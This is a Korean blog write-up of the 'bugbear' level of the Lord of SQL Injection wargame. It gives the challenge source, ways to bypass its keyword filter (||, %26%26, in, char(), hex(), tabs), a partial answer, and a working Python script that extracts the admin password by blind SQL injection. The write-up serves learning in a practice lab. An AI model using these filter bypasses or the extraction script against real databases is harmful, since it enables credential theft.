[LOS] 13번 bugbear 풀이

2019. 8. 7. 00:22문제풀이/los.rubiya.kr

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 
?>

금지단어는 prob _ . () ' substr ascii = or and (공백) like 0x 다.

 

그 외는 저번 문제(darkknight)와 같다.

 

저번 문제에서는 아래와 같은 꼴로 만들어 주었다.

no=0 or id like 0x61646d696e and mid(pw,1,1)>0x64

or과 and는 ||와 %26%26으로 대체하고, like는 in으로 대체하며, 공백은 %09(tab)으로 대체하거나 공백이 필요없게 괄호로 묶어주면 된다.

0x64는 대신에 char(100)을  쓸 수 있다.(hex -> dec)

또, 글자를 비교할 땐 0x 대신 hex()를 쓸 수 있다.

힌트는 이정도..?

 

또 코드를 돌려주자.

 

정답은 52dc3991~

 

...더보기
import urllib.request

url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
headers = {}
headers['cookie']=" "
headers['User-Agent']="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"

#length

def find_leth():

    leth = 1

    while(1):
        lth_url = "?no=0||(id)in(char(97,100,109,105,110))%26%26length(pw)<"+str(leth)
        req = urllib.request.Request(url+lth_url, headers=headers)
        data = urllib.request.urlopen(req).read().decode('utf-8')

        if(data.find("Hello admin")==-1):
            leth+=1
        else:
            print(f'leth={leth-1}')
            return (leth-1)

def bin_search_num(i):

    front = 0
    end = 9

    while(front<=end):

        mid = int((front+end)/2)

        pw_mid = "?no=0||(id)in(char(97,100,109,105,110))%26%26mid(pw,"+str(i)+",1)>"+str(mid)
        pw_mid1 = "?no=0||(id)in(char(97,100,109,105,110))%26%26mid(pw,"+str(i)+",1)>"+str(mid+1)

        req = urllib.request.Request(url+pw_mid, headers=headers)
        data = urllib.request.urlopen(req).read().decode('utf-8')

        req1 = urllib.request.Request(url+pw_mid1, headers=headers)
        data1 = urllib.request.urlopen(req1).read().decode('utf-8')

        if((data.find("Hello admin")!=-1) and (data1.find("Hello admin")==-1)):
            print(f'{i}th key: {mid+1}')
            return str(mid+1)

        elif((data.find("Hello admin")!=-1) and (data1.find("Hello admin")!=-1)):
            #print(f'1 - i:{i}, front:{front}, end:{end}')
            front = mid+1
            continue

        elif((data.find("Hello admin")==-1) and (data1.find("Hello admin")==-1)):
            #print(f'2 - i:{i}, front:{front}, end:{end}')
            end = mid-1
            continue



def bin_search_ascii(i):

    front = 58
    end = 126

    while(front<=end):

        mid = int((front+end)/2)

        pw_mid = "?no=0||(id)in(char(97,100,109,105,110))%26%26hex(mid(pw,"+str(i)+",1))>hex("+str(mid)+")"
        pw_mid1 = "?no=0||(id)in(char(97,100,109,105,110))%26%26hex(mid(pw,"+str(i)+",1))>hex("+str(mid+1)+")"

        req = urllib.request.Request(url+pw_mid, headers=headers)
        data = urllib.request.urlopen(req).read().decode('utf-8')

        req1 = urllib.request.Request(url+pw_mid1, headers=headers)
        data1 = urllib.request.urlopen(req1).read().decode('utf-8')

        if((data.find("Hello admin")!=-1) and (data1.find("Hello admin")==-1)):
            print(f'{i}th key: {chr(mid+1)}')
            return chr(mid+1)

        elif((data.find("Hello admin")!=-1) and (data1.find("Hello admin")!=-1)):
            #print(f'ascii 1 - i:{i}, front:{front}, end:{end}')
            front = mid+1
            continue

        elif((data.find("Hello admin")==-1) and (data1.find("Hello admin")==-1)):
            #print(f'ascii 2 - i:{i}, front:{front}, end:{end}')
            end = mid-1
            continue


if __name__ == '__main__':

    leth = find_leth()
    ans = []

    for i in range(1,leth+1):

        ans.append(bin_search_num(i))

        if (ans[i-1]==None):

             ans[i-1] = bin_search_ascii(i)

        if(ans[i-1]==None):
            print(f'{i}th key: 0')
            ans[i-1] = '0'

    print('password is '+''.join(ans))

'문제풀이 > los.rubiya.kr' 카테고리의 다른 글

[LOS] 15번 assassin 풀이  (0) 2019.08.07
[LOS] 14번 giant 풀이  (0) 2019.08.07
[LOS] 12번 darkknight 풀이  (0) 2019.08.06
[LOS] 11번 Golem 풀이  (0) 2019.08.06
[LOS] 10번 skeleton 풀이  (0) 2019.07.31